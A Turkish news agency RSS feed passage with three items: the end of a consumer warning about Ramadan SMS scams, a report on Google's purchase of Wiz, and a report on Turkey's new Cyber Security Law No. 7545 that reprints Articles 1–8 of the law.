<p data-start="2062" data-end="2371"><em data-start="2062" data-end="2369">“Dolandırıcılar sadece yardım istemekle kalmıyor, ‘hediye çeki kazandınız’ gibi mesajlarla da insanları kandırmaya çalışıyor. Unutulmamalıdır ki bedava peynir fare kapanında olur. Vatandaşlar, bu tür mesajlara ve linklere tıklamamalı. Yardım yaparken gerçekten ihtiyaç sahibi olup olmadığını araştırmalı.”</em></p>
<p data-start="2373" data-end="2404"><strong data-start="2373" data-end="2402">İftar Rezervasyonu Tuzağı</strong></p>
<p data-start="2406" data-end="2680">Ramazan ayında dolandırıcıların en çok kullandığı yöntemlerden biri de iftar rezervasyonu mesajları. ‘İftar rezervasyonunuz aktif edilmiştir’ şeklindeki mesajlar, içerdikleri zararlı linkler aracılığıyla telefonlara sızmayı ve banka hesaplarına erişim sağlamayı amaçlıyor.</p>
<p data-start="2682" data-end="2874">Tüketici dernekleri, Ramazan Bayramı yaklaştıkça dolandırıcılık olaylarının daha da arttığını belirterek, vatandaşların her türlü mesaj ve çağrıya temkinli yaklaşması gerektiğini vurguluyor.</p>
<p data-start="2876" data-end="3079"><strong data-start="2876" data-end="2888"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google, siber güvenlik devi Wiz'i 32 milyar dolara satın aldı!</title>
            <link>https://cumha.com.tr/google-siber-guvenlik-devi-wizi-32-milyar-dolara-satin-aldi</link>
            <guid>https://cumha.com.tr/google-siber-guvenlik-devi-wizi-32-milyar-dolara-satin-aldi</guid>
            <description><![CDATA[ Google’ın çatı şirketi Alphabet, New York merkezli siber güvenlik firması Wiz’i 32 milyar dolara satın almak için anlaşmaya vardı. Bu satın alım, 2012’de Motorola Mobility için ödenen 12,5 milyar doları aşarak Google tarihindeki en büyük anlaşma olacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67da75c020c93.webp" length="37530" type="image/webp"/>
            
            <pubDate>Wed, 19 Mar 2025 11:10:01 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Google, Wiz&#039;i neden satın aldı, Google&#039;ın en büyük satın alımı hangisi, Wiz hangi şirketlere hizmet veriyor, satın alım antitröst incelemesine takılacak mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="354" data-end="595">Google, bulut bilişim güvenliğini güçlendirmek amacıyla siber güvenlik şirketi Wiz'i 32 milyar dolara satın alıyor. Alphabet tarafından yapılan duyuruya göre, satın alımın tamamlanması için düzenleyici onay bekleniyor.</p>
<p data-start="597" data-end="1017"><strong data-start="597" data-end="647">Wiz, dev teknoloji şirketlerine hizmet veriyor</strong><br data-start="647" data-end="650">İsrail merkezli bir girişim olan Wiz, Microsoft, Amazon ve Oracle gibi teknoloji devlerine bulut tabanlı güvenlik çözümleri sağlıyor. Google, satın alımın ardından Wiz’in Google Cloud bünyesinde faaliyet göstermeye devam edeceğini açıkladı. Ancak tekelcilik endişelerini önlemek amacıyla Wiz’in ürünlerinin diğer bulut platformlarında da hizmet vereceği vurgulandı.</p>
<p data-start="1019" data-end="1519"><strong data-start="1019" data-end="1063">Antitröst incelemesi süreci devam ediyor</strong><br data-start="1063" data-end="1066">Google, geçen yıl Wiz’i 23 milyar dolar değerlemeyle satın almayı planlamış ancak şirketin yöneticileri ve yatırımcıları antitröst yasalarına takılabileceği gerekçesiyle anlaşmayı reddetmişti. Şimdi ise yeni ABD yönetimi ve Federal Ticaret Komisyonu’nun (FTC) daha esnek bir yaklaşım sergileyeceği düşünülüyor. FTC Başkanı Andrew Ferguson’un, büyük teknoloji şirketlerine yönelik sert tutumu nedeniyle satın alımın onay süreci yakından takip ediliyor.</p>
<p data-start="1521" data-end="1927"><strong data-start="1521" data-end="1574">Google, siber güvenlik yatırımlarına devam ediyor</strong><br data-start="1574" data-end="1577">Google, son yıllarda siber güvenlik alanında büyük yatırımlar yaptı. 2022’de 500 milyon dolara Siemplify ve 5,4 milyar dolara Mandiant'ı satın alan şirket, Wiz ile bu alandaki en büyük hamlesini gerçekleştirmiş olacak. Öte yandan, Google halen arama motoru ve dijital reklamcılık faaliyetleri nedeniyle iki ayrı antitröst davasıyla mücadele ediyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Türkiye'nin İlk Siber Güvenlik Kanunu Yürürlüğe Girdi</title>
            <link>https://cumha.com.tr/turkiyenin-ilk-siber-guvenlik-kanunu-yururluge-girdi</link>
            <guid>https://cumha.com.tr/turkiyenin-ilk-siber-guvenlik-kanunu-yururluge-girdi</guid>
            <description><![CDATA[ Resmî Gazete’de yayımlanan 7545 sayılı Siber Güvenlik Kanunu ile Türkiye’nin siber savunma altyapısı güçlendiriliyor. Yeni düzenleme, kamu kurumları ve kritik altyapıları siber tehditlere karşı koruma altına alırken, sertifikasyon ve denetim süreçlerini de kapsıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67da4cee8c086.webp" length="80226" type="image/webp"/>
            
            <pubDate>Wed, 19 Mar 2025 07:50:34 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Türkiye’nin siber güvenlik kanunu neleri kapsıyor, siber saldırılara yönelik cezalar neler, kritik altyapılar nasıl korunacak, siber güvenlik sertifikasyonu nasıl uygulanacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="380" data-end="721">Türkiye, dijital dünyadaki güvenliğini artırmak amacıyla önemli bir adım attı. 7545 sayılı <strong data-start="471" data-end="496">Siber Güvenlik Kanunu</strong>, 19 Mart 2025 tarihli Resmî Gazete’de yayımlanarak yürürlüğe girdi. Kanun, siber tehditlere karşı ulusal düzeyde önlemler alınmasını sağlarken, kamu kurumları ve kritik altyapılar için yeni güvenlik standartları getiriyor.</p>
<p data-start="723" data-end="774"><strong data-start="723" data-end="772">Siber Güvenliği Güçlendiren Yeni Düzenlemeler</strong></p>
<p data-start="776" data-end="1080">Kanunun amacı, Türkiye’nin siber uzaydaki milli güvenliğini sağlamak, kamu ve özel sektörü siber tehditlerden korumak ve ulusal çapta bir siber güvenlik stratejisi oluşturmak olarak belirlendi. Düzenleme kapsamında <strong data-start="991" data-end="1016">Siber Güvenlik Kurulu</strong> kurulacak ve <strong data-start="1030" data-end="1059">Siber Güvenlik Başkanlığı</strong> yetkilendirilecek.</p>
<p data-start="1082" data-end="1274">Kanunun kapsamına, kamu kurumları, kritik altyapılar, meslek kuruluşları, özel şirketler ve bireyler dahil edildi. Ancak, <strong data-start="1204" data-end="1239">askeri ve istihbari faaliyetler</strong> bu düzenlemenin dışında tutuldu.</p>
<p data-start="1276" data-end="1325"><strong data-start="1276" data-end="1323">Siber Güvenlik Başkanlığı’na Geniş Yetkiler</strong></p>
<p data-start="1327" data-end="1378">Yeni düzenlemeye göre, Siber Güvenlik Başkanlığı;</p>
<ul data-start="1379" data-end="1724">
<li data-start="1379" data-end="1450">Kritik altyapıların siber saldırılara karşı korunmasını sağlayacak,</li>
<li data-start="1451" data-end="1547">Kamu kurumları ile kritik altyapılara yönelik siber güvenlik denetimlerini gerçekleştirecek,</li>
<li data-start="1548" data-end="1642">Siber tehdit istihbaratı toplayarak siber saldırıları önlemeye yönelik çalışmalar yapacak,</li>
<li data-start="1643" data-end="1724">Siber güvenlik alanında sertifikasyon ve yetkilendirme süreçlerini yönetecek.</li>
</ul>
<p data-start="1726" data-end="1762"><strong data-start="1726" data-end="1760">Siber Suçlar İçin Ağır Cezalar</strong></p>
<p data-start="1764" data-end="2076">Kanunda siber güvenlikle ilgili ağır cezalar da öngörülüyor. Kritik altyapılara yönelik siber saldırı düzenleyenlere <strong data-start="1881" data-end="1910">8 ila 12 yıl hapis cezası</strong>, sızdırılan verileri yayanlara <strong data-start="1942" data-end="1972">10 ila 15 yıl hapis cezası</strong> verilecek. Ayrıca, sahte veri sızıntısı haberleri yayanlara <strong data-start="2033" data-end="2061">2 ila 5 yıl hapis cezası</strong> uygulanacak.</p>
<p data-start="2078" data-end="2124"><strong data-start="2078" data-end="2122">Denetim ve Sertifikasyon Süreci Başlıyor</strong></p>
<p data-start="2126" data-end="2376">Kanuna göre, siber güvenlik alanında faaliyet gösteren şirketler ve yazılım sağlayıcıları, <strong data-start="2217" data-end="2251">yetkilendirme ve sertifikasyon</strong> sürecine tabi tutulacak. <strong data-start="2277" data-end="2374">Kamu kurumlarında kullanılacak yazılım ve donanımların yerli ve milli olması teşvik edilecek.</strong></p>
<p data-start="2378" data-end="2534">Uzmanlara göre, yeni yasa Türkiye’nin siber güvenlik altyapısını güçlendirecek ve ulusal düzeyde siber tehditlere karşı daha etkili bir koruma sağlayacak.</p>
<p data-start="2378" data-end="2534">İşte yayınlanan <strong>SİBER GÜVENLİK KANUNU </strong>tamamı</p>
<p class="Metin"><b><span>Amaç<o:p></o:p></span></b></p>
<p class="Metin"><span class="GramE"><b><span>MADDE 1-</span></b><span> (1) Bu Kanunun amacı, Türkiye Cumhuriyeti’nin siber uzaydaki milli gücünü meydana getiren bütün unsurlarına karşı içten ve dıştan yöneltilen mevcut ve muhtemel tehditlerin tespit ve bertaraf edilmesi, siber olayların muhtemel etkilerini azaltmaya yönelik esasların belirlenmesi, kamu kurum ve kuruluşları, kamu kurumu niteliğinde meslek kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşların siber saldırılara karşı korunmasına yönelik gerekli düzenlemelerin yapılması, ülkenin siber güvenliğini güçlendirmek için strateji ve politikaların belirlenmesi ile Siber Güvenlik Kurulunun kurulmasına ilişkin esasları düzenlemektir.</span></span><span><o:p></o:p></span></p>
<p class="Metin"><b><span>Kapsam<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 2- </span></b><span>(1) Bu Kanun, siber uzayda varlık gösteren, faaliyet yürüten, hizmet sunan kamu kurum ve kuruluşları, kamu kurumu niteliğinde meslek kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşları kapsar.<o:p></o:p></span></p>
<p class="Metin"><span>(2) <span class="GramE">4/7/1934</span> tarihli ve 2559 sayılı Polis Vazife ve Salâhiyet Kanunu, 9/7/1982 tarihli ve 2692 sayılı Sahil Güvenlik Komutanlığı Kanunu ve 10/3/1983 tarihli ve 2803 sayılı Jandarma Teşkilat, Görev ve Yetkileri Kanunu uyarınca yürütülen <span class="SpellE">istihbari</span> faaliyetler ile 1/11/1983 tarihli ve 2937 sayılı Devlet İstihbarat Hizmetleri ve Milli İstihbarat Teşkilatı Kanunu ile 4/1/1961 tarihli ve 211 sayılı Türk Silahlı Kuvvetleri İç Hizmet Kanunu uyarınca yürütülen faaliyetler bu Kanun kapsamı dışındadır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Tanım ve kısaltmalar<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 3- </span></b><span>(1) Bu Kanunda geçen;<o:p></o:p></span></p>
<p class="Metin"><span>a) Barındırma: Bilişim sistemlerinin harici bir veri merkezinde bulundurulmasını,<o:p></o:p></span></p>
<p class="Metin"><span>b) Başkan: Siber Güvenlik Başkanını,<o:p></o:p></span></p>
<p class="Metin"><span>c) Başkanlık: Siber Güvenlik Başkanlığını,<o:p></o:p></span></p>
<p class="Metin"><span>ç) Bilişim sistemleri: Bilgi ve iletişim teknolojileri vasıtasıyla sağlanan her türlü hizmetin, işlemin ve verinin sunumunda kullanılan donanım, yazılım, sistem ve aktif veya pasif durumda bulunan tüm diğer bileşenleri,<o:p></o:p></span></p>
<p class="Metin"><span>d) Kritik altyapı: İşlediği bilginin/verinin gizliliği, bütünlüğü veya erişilebilirliği bozulduğunda can kaybına, büyük ölçekli ekonomik zarara ve güvenlik açıklarına veya kamu düzeninin bozulmasına yol açabilecek bilişim sistemlerini barındıran altyapıları,<o:p></o:p></span></p>
<p class="Metin"><span>e) Kritik kamu hizmeti: Ulusal, toplumsal veya ekonomik faaliyetlerin sürdürülmesi için gerekli olan ve kesintiye uğraması veya zarar görmesi halinde ulusal güvenlik, ülkenin sosyal veya ekonomik refahı, kamu düzeni veya sağlığı ya da diğer hizmetlerin sunumu üzerinde önemli bir etki oluşturabilecek ülke genelinde tekel veya sınırlı ikame ile sunulan hizmeti,</span><span><o:p></o:p></span></p>
<p class="Metin"><span>f) Siber güvenlik: Siber uzayı oluşturan bilişim sistemlerinin saldırılardan korunmasını, bu ortamda işlenen verinin gizlilik, bütünlük ve erişilebilirliğinin güvence altına alınmasını, saldırıların ve siber olayların tespit edilmesini, bu tespitlere karşı tepki ve alarm mekanizmalarının devreye alınmasını ve sonrasında yaşanan siber olay öncesi duruma geri döndürülmesini kapsayan faaliyetler bütününü,<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber olay: Bilişim sistemlerinin veya verinin gizlilik, bütünlük veya erişilebilirliğinin ihlal edilmesini,<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber saldırı: Siber uzaydaki bilişim sistemlerinin ve bu sistemler tarafından işlenen verinin gizliliği, bütünlüğü veya erişilebilirliğini ortadan kaldırmak amacıyla, siber uzayın herhangi bir yerindeki kişi veya bilişim sistemlerine yönelik olarak kasıtlı yapılan işlemleri,<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber tehdit: Bilişim sistemlerinin, bu sistemlerde bulunan veya bu sistemler tarafından işlenen verinin gizlilik, bütünlük veya erişilebilirliğinin ihlal edilmesine neden olabilecek potansiyel tehlikeleri,<o:p></o:p></span></p>
<p class="Metin"><span>ı) Siber tehdit istihbaratı: Siber uzaydaki varlıklara yönelik mevcut veya potansiyel siber tehdit unsurları ile siber saldırılar hakkında bir araya getirilmiş, dönüştürülmüş, analiz edilmiş, yorumlanmış veya zenginleştirilmiş bilgiyi,<o:p></o:p></span></p>
<p class="Metin"><span>i) Siber uzay: Doğrudan ya da dolaylı olarak internete, elektronik haberleşme veya bilgisayar ağlarına bağlı olan tüm bilişim sistemlerini ve bunları birbirine bağlayan ağlardan oluşan ortamı,<o:p></o:p></span></p>
<p class="Metin"><span>j) SOME: Siber olaylara müdahale ekibini,<o:p></o:p></span></p>
<p class="Metin"><span>k) Varlık: Elektronik veya fiziksel ortamlarda yer alan ve iletişim yoluyla aktarılabilen veriyi içeren tüm bilgi ve bilgi işleme olanaklarını, veriyi kullanan veya taşıyan personeli ve veriyi barındıran fiziksel mekânları,<o:p></o:p></span></p>
<p class="Metin"><span>l) Zafiyet: Siber uzayda yer alan varlıkların herhangi bir siber tehdit tarafından istismar edilebilecek zayıflık ve güvenlik açıklarını,<o:p></o:p></span></p>
<p class="Metin"><span>ifade</span><span> eder.<o:p></o:p></span></p>
<p class="Metin"><b><span>Temel ilkeler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 4- </span></b><span>(1) Siber güvenliğin sağlanmasında temel ilkeler şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Siber güvenlik milli güvenliğin ayrılmaz bir parçasıdır.<o:p></o:p></span></p>
<p class="Metin"><span>b) Kritik altyapı ve bilişim sistemlerinin korunması ile güvenli bir siber uzay oluşturulması temel hedeftir.<o:p></o:p></span></p>
<p class="Metin"><span>c) Siber güvenlikle ilgili çalışmalar kurumsallık, süreklilik ve sürdürülebilirlik temelli yürütülür.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Siber güvenlik tedbirlerinin, hizmet ve ürünlerin tüm yaşam döngüsü boyunca uygulanması esastır.<o:p></o:p></span></p>
<p class="Metin"><span>d) Siber güvenliğin sağlanmasına yönelik çalışmalarda öncelikle yerli ve milli ürünler tercih edilir.<o:p></o:p></span></p>
<p class="Metin"><span>e) Siber güvenlik politika ve stratejilerinin yürütülmesi ile siber saldırıların önlenmesi veya etkisinin azaltılmasına yönelik gerekli tedbirlerin alınmasından tüm kamu kurum ve kuruluşları ile gerçek ve tüzel kişiler sorumludur.<o:p></o:p></span></p>
<p class="Metin"><span>f) Siber güvenlik süreçlerinin yürütülmesinde hesap verebilirlik esastır.<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber güvenlik politika ve strateji geliştirme çalışmaları sürekli gelişim yaklaşımı ile yürütülür.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik alanında nitelikli insan kaynağı kabiliyet ve kapasitesinin artırılmasına yönelik çalışmalar teşvik edilir.<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber güvenlik kültürünün toplum geneline yaygınlaştırılması hedeflenir.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Hukukun üstünlüğü, temel insan hak ve hürriyetleri ile mahremiyetin korunması ilkeleri temel esas kabul edilir.<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>İKİNCİ BÖLÜM<o:p></o:p></span></p>
<p class="OrtaBalkBold"><span>Görev, Yetki, Sorumluluk, Denetim ve Siber Güvenlik Kurulu<o:p></o:p></span></p>
<p class="Metin"><b><span>Başkanlığın görevleri<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 5- </span></b><span>(1) Başkanlığın görevleri şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) İlgili mevzuatta yer alan görevleri yapmak.<o:p></o:p></span></p>
<p class="Metin"><span>b) Kritik altyapılar ve bilişim sistemlerinin siber dayanıklılığının artırılmasına, siber saldırılara karşı korunmasına, gerçekleştirilen siber saldırıların tespitine, muhtemel saldırıların önlenmesine ve etkilerinin azaltılmasına veya ortadan kaldırılmasına yönelik faaliyet yürütmek, bu kapsamda zafiyet ve sızma testleri ile varlıklara yönelik risk analizleri yapmak veya yaptırmak, siber tehditlerle mücadele etmek, siber tehdit istihbaratı elde etmek, oluşturmak ve paylaşmak, zararlı yazılım inceleme faaliyetleri yürütmek.</span><span><o:p></o:p></span></p>
<p class="Metin"><span>c) Kritik altyapılar ile ait oldukları kurumları ve konumları belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Kamu kurum ve kuruluşları ile kritik altyapıların veri <span class="GramE">envanteri</span> dâhil olmak üzere tüm varlıklarının envanterinin tutulmasını ve varlıklara yönelik risk analizinin gerçekleştirilmesini sağlamak, kamu kurum ve kuruluşları ile kritik altyapıların sahip olduğu varlıkların kritikliğine göre güvenlik tedbirlerini almak veya aldırmak.<o:p></o:p></span></p>
<p class="Metin"><span>d) <span class="SpellE">SOME’ler</span> kurmak, kurdurmak ve denetlemek, <span class="SpellE">SOME’lerin</span> olgunluk seviyelerinin belirlenmesi ve artırılması için çalışmalar yapmak, siber güvenlik tatbikatları gerçekleştirerek <span class="SpellE">SOME’lerin</span> siber olay müdahale kabiliyetlerini ölçmek, diğer ülkelerin siber olaylara müdahale ekipleriyle koordinasyon kurmak, her türlü siber müdahale aracının ve milli çözümlerin üretilmesi ve geliştirilmesi amacıyla çalışmalar yapmak, yaptırmak ve bunları teşvik etmek.</span><span><o:p></o:p></span></p>
<p class="Metin"><span>e) Siber güvenlik alanında faaliyet gösterenlerin uyması gereken usul ve esasları düzenlemek.<o:p></o:p></span></p>
<p class="Metin"><span>f) Kamu kurum ve kuruluşları ile kritik kamu hizmetlerinin siber güvenliğini sağlamak amacıyla gerekli altyapıları kurmak, kurdurmak, işletmek, işlettirmek ve kamu kurum ve kuruluşlarına güvenli sistem ve altyapılar üzerinden barındırma hizmeti sunmak veya sunulmasını sağlamak, bu faaliyetlere yönelik uygulama usul ve esaslarını belirlemek.<o:p></o:p></span></p>
<p class="Metin"><span>g) Siber güvenlik alanına ilişkin standartları hazırlamak, diğer kişi veya kuruluşlarca hazırlanan standartları tetkik etmek, bunlar hakkında mütalaa vermek, uygun bulduğu takdirde standart olarak kabul etmek, bunları yayımlamak ve uygulanmalarını takip etmek.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik alanına ilişkin yazılım, donanım, ürün, sistem ve hizmetlere yönelik test ve sertifikasyon işlemlerini yürütmek, buna yönelik test altyapıları kurmak, kurdurmak ve işletmek ile siber güvenlik uzmanları ve şirketlerine yönelik sertifikasyon, yetkilendirme ve belgelendirme işlemlerini ilgili kurumlarla koordineli olarak yürütmek.<o:p></o:p></span></p>
<p class="Metin"><span>h) Siber güvenlik denetimini gerçekleştirmek ve sonucuna göre yaptırım uygulamak.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Kamu kurum ve kuruluşları ile kritik altyapılarda kullanılacak siber güvenlik ürün ve hizmetleri ile bunları sağlayacak işletmelerin taşıması gereken niteliklere yönelik teknik <span class="GramE">kriterler</span> belirlemek ve mevzuat düzenlemeleri yapmak, bunların denetimini yapmak ya da yaptırmak, denetimleri yapacak kuruluşların taşımaları gereken nitelikleri belirlemek, bu kuruluşları görevlendirmek, gerektiğinde görevlendirmeyi geçici olarak durdurmak ya da iptal etmek.<o:p></o:p></span></p>
<p class="Metin"><b><span>Yetkiler<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 6- </span></b><span>(1) Başkanlık, görevlerini yerine getirirken aşağıdaki yetkileri kullanır:<o:p></o:p></span></p>
<p class="Metin"><span>a) İlgili mevzuatta yer alan yetkileri kullanmak.<o:p></o:p></span></p>
<p class="Metin"><span>b) Bu Kanun kapsamındakilerin siber saldırılara karşı korunması ve bu saldırıların kaynağına karşı caydırıcılık sağlanması için gerekli tedbiri alır veya aldırır. Bu kapsamda bilişim sistemlerine uygun bulunan yazılım ve donanım ürünlerinin kurulum ve <span class="GramE">entegrasyonunu</span> sağlayabilir, bu ürünler tarafından üretilen veya toplanan veri ve <span class="SpellE">log</span> kayıtlarını Başkanlık yönetiminde bulunan bilişim sistemlerine aktarabilir, siber olayların tespitine yönelik gerekli yöntemi ve aracı kullanabilir.<o:p></o:p></span></p>
<p class="Metin"><span>c) Bu Kanun kapsamındakilerden siber olaya maruz kalanlara yerinde veya uzaktan siber olay müdahale desteği sağlayabilir, siber uzayda bulunan veya elde ettiği veri, imaj veya <span class="SpellE">log</span> kayıtları üzerinden saldırılara ait izleri takip edebilir, bunları inceleyerek <span class="SpellE">delillendirebilir</span>, suç teşkil ettiği değerlendirilen bulguları adli makamlar ve diğer ilgililer ile paylaşır, yurt içi ve yurt dışındaki paydaşlar ile koordinasyon sağlayabilir.</span><span><o:p></o:p></span></p>
<p class="Metin"><span>ç) Bu Kanun kapsamındakilerden, yürüttüğü faaliyetlerle sınırlı olmak üzere bilgi, belge, veri ve kayıtları alabilir ve değerlendirmesini yapabilir, bunlara ait arşivlerden, elektronik bilgi işlem merkezlerinden ve iletişim altyapısından yararlanabilir ve bunlarla irtibat kurabilir. Bu kapsamda elde edilen bilgi, belge, veri ve kayıtlar, en fazla iki yıl süreyle çalışmaya konu edilir ve çalışma süresi sonrasında imha edilir. Bu kapsamda talepte bulunulanlar, kendi mevzuatındaki hükümleri gerekçe göstermek suretiyle talebin yerine getirilmesinden kaçınamazlar.<o:p></o:p></span></p>
<p class="Metin"><span>d) Bilişim sistemlerindeki <span class="SpellE">log</span> kayıtlarını bünyesinde toplayabilir, saklayabilir, değerlendirebilir. Bunlar hakkında rapor hazırlayarak ilgili kurum ve kuruluşlar ile paylaşabilir.<o:p></o:p></span></p>
<p class="Metin"><span>e) Başkanlık, bakanlıklar ve diğer kamu kurum ve kuruluşları ile koordineli olarak siber güvenlik konularında ihtiyaç halinde personel tefrik edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>f) Görev alanına giren konularda uluslararası kuruluşlar ve ülkelerle ilişkiler yürütebilir, bilgi alışverişinde bulunabilir, ülkemizi temsil edebilir ve koordinasyonu sağlayabilir, uluslararası kuruluşların çalışmalarına katılabilir, alınan kararların uygulanmasını takip edebilir ve gerekli koordinasyonu sağlayabilir.<o:p></o:p></span></p>
<p class="Metin"><span>g) Bu Kanun kapsamındaki kurum, kuruluş ve ilgili diğer gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşları sınıflandırabilir, faaliyetlerini icra ederken gerektiğinde sadece belirli bir kısmını kapsayan hükümler oluşturabilir.<o:p></o:p></span></p>
<p class="Metin"><span>ğ) Siber güvenlik denetimi gerçekleştiren bağımsız denetçiler ve bağımsız denetim kuruluşlarını yetkilendirebilir, yetkisini süreli veya süresiz iptal edebilir.<o:p></o:p></span></p>
<p class="Metin"><span>h) Kamu kurum ve kuruluşları ile kritik altyapıların bilişim sistemlerinde kullanılacak ve siber güvenliğe etkisi olan yazılım, donanım, ürün ve hizmetlere dair <span class="GramE">kriterler</span> ile Başkanlığa yapılacak bildirimlere ilişkin usul ve esasları belirler.<o:p></o:p></span></p>
<p class="Metin"><span>ı) Siber güvenlik yazılım, donanım, ürün ve hizmetlerinin asgari güvenlik <span class="GramE">kriterlerini</span> belirler. Bunları sağlayacak veya tedarik edecek gerçek ve tüzel kişilere yönelik sertifikasyon, yetkilendirme ve belgelendirme süreçlerini yönetir. Siber güvenlik yazılım, donanım, ürün ve hizmetlerinin belirlenecek standartlara uygun hale getirilmesini talep edebilir, bu talebe uyum sağlamayanların kullanılmasını önleyici tedbirler alabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Bu Kanun uyarınca yürütülen iş ve işlemler kapsamında kişisel veriler; hukuka ve dürüstlük kurallarına uygun şekilde, doğru ve gerektiğinde güncel olmak kaydıyla, belirli, açık ve meşru amaçlarla, işlendiği amaçla bağlantılı, sınırlı ve ölçülü olmak kaydıyla ve işlendiği amaç için gerekli olan süre kadar muhafaza edilmek üzere işlenir. Bu Kanunda belirtilen yetkiler çerçevesinde elde edilecek kişisel veriler ve ticari sırlar; bu verilere erişilmesini gerektiren sebeplerin ortadan kalkması halinde resen silinir, yok edilir veya anonim hale getirilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Bu maddenin uygulanmasına ilişkin usul ve esaslar Cumhurbaşkanı tarafından çıkarılacak yönetmelikle belirlenir.<o:p></o:p></span></p>
<p class="Metin"><b><span>Sorumluluklar ve iş birliği<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 7- </span></b><span>(1) Bu Kanun kapsamında yer alan ve bilişim sistemleri kullanmak suretiyle hizmet sunan, veri toplayan, işleyen ve benzeri faaliyet yürütenlerin siber güvenliğe ilişkin görev ve sorumlulukları şunlardır:<o:p></o:p></span></p>
<p class="Metin"><span>a) Başkanlığın görev ve faaliyetleri kapsamında talep ettiği her türlü veri, bilgi, belge, donanım, yazılım ve diğer her türlü katkıyı öncelikle ve zamanında Başkanlığa iletmek.<o:p></o:p></span></p>
<p class="Metin"><span>b) Siber güvenliğe yönelik olarak milli güvenlik, kamu düzeni veya kamu hizmetinin gereği gibi yürütülmesi amacıyla mevzuatın öngördüğü tedbirleri almak, hizmet sundukları alanda tespit ettikleri zafiyet veya siber olayları gecikmeksizin Başkanlığa bildirmek.<o:p></o:p></span></p>
<p class="Metin"><span>c) Kamu kurumları ve kuruluşları ile kritik altyapılarda kullanılacak siber güvenlik ürün, sistem ve hizmetleri Başkanlık tarafından yetkilendirilmiş ve belgelendirilmiş siber güvenlik uzmanlarından, üreticilerden veya şirketlerden tedarik etmek.<o:p></o:p></span></p>
<p class="Metin"><span>ç) Sertifikasyon, yetkilendirme ve belgelendirmeye tabi siber güvenlik şirketlerince faaliyete başlamadan önce mevcut düzenlemeler çerçevesinde Başkanlığın onayını almak.<o:p></o:p></span></p>
<p class="Metin"><span>d) Siber olgunluğun artırılmasına yönelik Başkanlık tarafından geliştirilen politika, strateji, eylem planı ile yayımlanan diğer düzenleyici işlemlerde yer alan hususları yerine getirmek ve gerekli tedbirleri almak.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlık, bu Kanunda belirtilen faaliyetlerin yürütülmesinde kamu kurum ve kuruluşları, gerçek ve tüzel kişiler ile tüzel kişiliği bulunmayan kuruluşlarla iş birliği içerisinde çalışır.<o:p></o:p></span></p>
<p class="Metin"><b><span>Denetim<o:p></o:p></span></b></p>
<p class="Metin"><b><span>MADDE 8- </span></b><span>(1) Başkanlık, bu Kanunda belirtilen görevleri ile ilgili olarak gerekli gördüğü hallerde Kanunun kapsamına giren her türlü fiil ve işlemi denetleyebilir; bu amaçla mahallinde inceleme yapabilir veya yaptırabilir. Denetim, bu Kanun kapsamındaki kurum, kuruluş ve ilgili diğer gerçek ve tüzel kişilerin bu Kanun hükümleriyle ilgili faaliyet ve işlemlerini kapsar. Denetime Başkanlık personeli, yetkilendirilmiş ve belgelendirilmiş bağımsız denetçiler ve bağımsız denetim kuruluşları yetkilidir. Bu yetki, Başkan tarafından görevlendirilenler tarafından kullanılır. Kamu kurum ve kuruluşları ile kritik altyapılarda denetimler, Başkanlık personelince veya refakatinde yapılır.<o:p></o:p></span></p>
<p class="Metin"><span>(2) Başkanlık, denetim faaliyetlerine ilişkin önemlilik ve öncelik ilkeleri ile risk değerlendirmelerinde dikkate alınacak ölçütleri ve uygulama esaslarını belirler. Denetim faaliyeti, önemlilik ve öncelik ilkeleri ile risk değerlendirmeleri kapsamında oluşturulacak program uyarınca yürütülür. Başkan, oluşturulan program dışında incelenmesi gerekli görülen hususlarda program dışı denetim yaptırabilir.<o:p></o:p></span></p>
<p class="Metin"><span>(3) Mülki amirler, kolluk kuvvetleri ve diğer kamu kurumlarının amir ve memurları inceleme veya denetimle görevlendirilenlere her türlü kolaylığı göstermek ve yardımda bulunmakla yükümlüdürler.<o:p></o:p></span></p>
